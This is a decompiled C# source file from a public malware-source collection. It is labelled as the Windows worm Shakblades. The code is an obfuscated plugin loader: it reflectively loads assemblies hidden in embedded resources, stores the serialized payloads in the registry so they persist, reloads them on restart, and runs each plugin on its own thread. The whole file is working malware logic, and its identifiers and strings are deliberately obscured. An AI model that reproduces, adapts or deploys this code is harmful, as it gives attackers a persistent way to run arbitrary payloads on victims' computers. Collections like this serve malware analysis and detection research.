mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
202 lines
8.4 KiB
C#
202 lines
8.4 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᙐᗡѬᵲ૦ᵛଔѥቾ
|
|||
|
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
|||
|
|
|||
|
using Microsoft.Win32;
|
|||
|
using Plugin;
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Resources;
|
|||
|
using System.Runtime.Serialization.Formatters.Binary;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace Ҧ߲๒ʽ໙ୄᴘ
|
|||
|
{
|
|||
|
public class ᙐᗡѬᵲ૦ᵛଔѥቾ
|
|||
|
{
|
|||
|
public static SortedList<Guid, byte[]> \u0382Ⴊ\u19CD\u0DF1в = new SortedList<Guid, byte[]>();
|
|||
|
public static SortedList<Guid, IPlugin> රᓙ = new SortedList<Guid, IPlugin>();
|
|||
|
private static string \u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
|
|||
|
|
|||
|
public static event ᙐᗡѬᵲ૦ᵛଔѥቾ.ᘕঃ \u0C11\u0FBFᵥރតൃĚŹᗐ;
|
|||
|
|
|||
|
public static void ᇎ()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
BinaryFormatter binaryFormatter = new BinaryFormatter();
|
|||
|
MemoryStream serializationStream = new MemoryStream();
|
|||
|
binaryFormatter.Serialize((Stream) serializationStream, (object) ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в);
|
|||
|
serializationStream.Close();
|
|||
|
byte[] numArray = \u1928ᔾዔ.ᅀძṶၠ(serializationStream.ToArray(), false);
|
|||
|
if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser)
|
|||
|
Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A, (object) numArray);
|
|||
|
else
|
|||
|
Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A, (object) numArray);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void ʉᆖͧ\u05CB\u00A9ᤤդܛ() => new Thread((ThreadStart) (() =>
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
BinaryFormatter binaryFormatter = new BinaryFormatter();
|
|||
|
MemoryStream memoryStream;
|
|||
|
byte[] numArray1;
|
|||
|
if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser)
|
|||
|
{
|
|||
|
MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷(Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A) as byte[], false));
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
|
|||
|
serializationStream.Close();
|
|||
|
serializationStream.Dispose();
|
|||
|
memoryStream = (MemoryStream) null;
|
|||
|
numArray1 = (byte[]) null;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷(Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A) as byte[], false));
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
|
|||
|
serializationStream.Close();
|
|||
|
serializationStream.Dispose();
|
|||
|
memoryStream = (MemoryStream) null;
|
|||
|
numArray1 = (byte[]) null;
|
|||
|
}
|
|||
|
foreach (byte[] numArray2 in (IEnumerable<byte[]>) ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Values)
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(numArray2);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
})).Start();
|
|||
|
|
|||
|
public static void dz() => new Thread((ThreadStart) (() =>
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (Assembly.GetExecutingAssembly().GetManifestResourceNames().Length == 0)
|
|||
|
return;
|
|||
|
ResourceManager resourceManager = new ResourceManager("p", Assembly.GetExecutingAssembly());
|
|||
|
int num = (int) resourceManager.GetObject("Len");
|
|||
|
for (int index = 0; index < num; ++index)
|
|||
|
{
|
|||
|
byte[] numArray = (byte[]) resourceManager.GetObject(index.ToString());
|
|||
|
Array.Reverse((Array) numArray);
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(numArray);
|
|||
|
}
|
|||
|
if (!ȩזြڹᡡỾỔው.ጅũކᠾߠጇᔰᏫ)
|
|||
|
return;
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.ᇎ();
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
Console.WriteLine(ex.Message);
|
|||
|
}
|
|||
|
})).Start();
|
|||
|
|
|||
|
public static bool ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(byte[] _param0)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (Type type in Assembly.Load(_param0).GetTypes())
|
|||
|
{
|
|||
|
int num = 0;
|
|||
|
if (type.IsClass && type.IsSubclassOf(typeof (IPlugin)))
|
|||
|
{
|
|||
|
IPlugin instance = (IPlugin) Activator.CreateInstance(type);
|
|||
|
if (instance.ExecuteOnLoad)
|
|||
|
{
|
|||
|
instance.Initialize();
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.ᄄĐἮᥪ᭫ᘙȃই((object) null, instance, instance.ExecuteOnLoadArgs);
|
|||
|
}
|
|||
|
if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.ContainsKey(instance.Guid))
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Add(instance.Guid, _param0);
|
|||
|
else
|
|||
|
++num;
|
|||
|
if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(instance.Guid))
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Add(instance.Guid, instance);
|
|||
|
else
|
|||
|
++num;
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
|
|||
|
if (num == 2)
|
|||
|
{
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = instance.Name + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
|
|||
|
return false;
|
|||
|
}
|
|||
|
if (ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, instance);
|
|||
|
return true;
|
|||
|
}
|
|||
|
}
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("dp+UpqZTqpynm1N8g5+ompyhUzOdE72coaeYpZmUlphToaKnU5miqKGXYQ==", true);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
Console.WriteLine(ex.Message);
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = ex.Message;
|
|||
|
}
|
|||
|
return false;
|
|||
|
}
|
|||
|
|
|||
|
public static bool ᓒኞᣆќᆈࡏಒ\u0B76ୁ(IPlugin _param0)
|
|||
|
{
|
|||
|
if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(_param0.Guid))
|
|||
|
{
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Add(_param0.Guid, _param0);
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
|
|||
|
if (ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, _param0);
|
|||
|
return true;
|
|||
|
}
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = _param0.Name + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
|
|||
|
return false;
|
|||
|
}
|
|||
|
|
|||
|
public static void \u136Eᐰ\u1CAA\u0EE1ள(Guid _param0)
|
|||
|
{
|
|||
|
if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(_param0))
|
|||
|
return;
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Remove(_param0);
|
|||
|
ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Remove(_param0);
|
|||
|
}
|
|||
|
|
|||
|
public static string \u0CC0() => ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ;
|
|||
|
|
|||
|
public static void ᄄĐἮᥪ᭫ᘙȃই(object ඳ, IPlugin _param1, PluginArgs _param2) => new Thread((ThreadStart) (() =>
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
_param1.Execute(ඳ, _param2);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
Console.WriteLine(ex.Message);
|
|||
|
}
|
|||
|
})).Start();
|
|||
|
|
|||
|
public static void ፂ\u0ECFȐفᅵټ༵୩()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (!ȩזြڹᡡỾỔው.ጅũކᠾߠጇᔰᏫ)
|
|||
|
return;
|
|||
|
if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser)
|
|||
|
Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A);
|
|||
|
else
|
|||
|
Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public delegate void ᘕঃ(object sender, IPlugin plugin);
|
|||
|
}
|
|||
|
}
|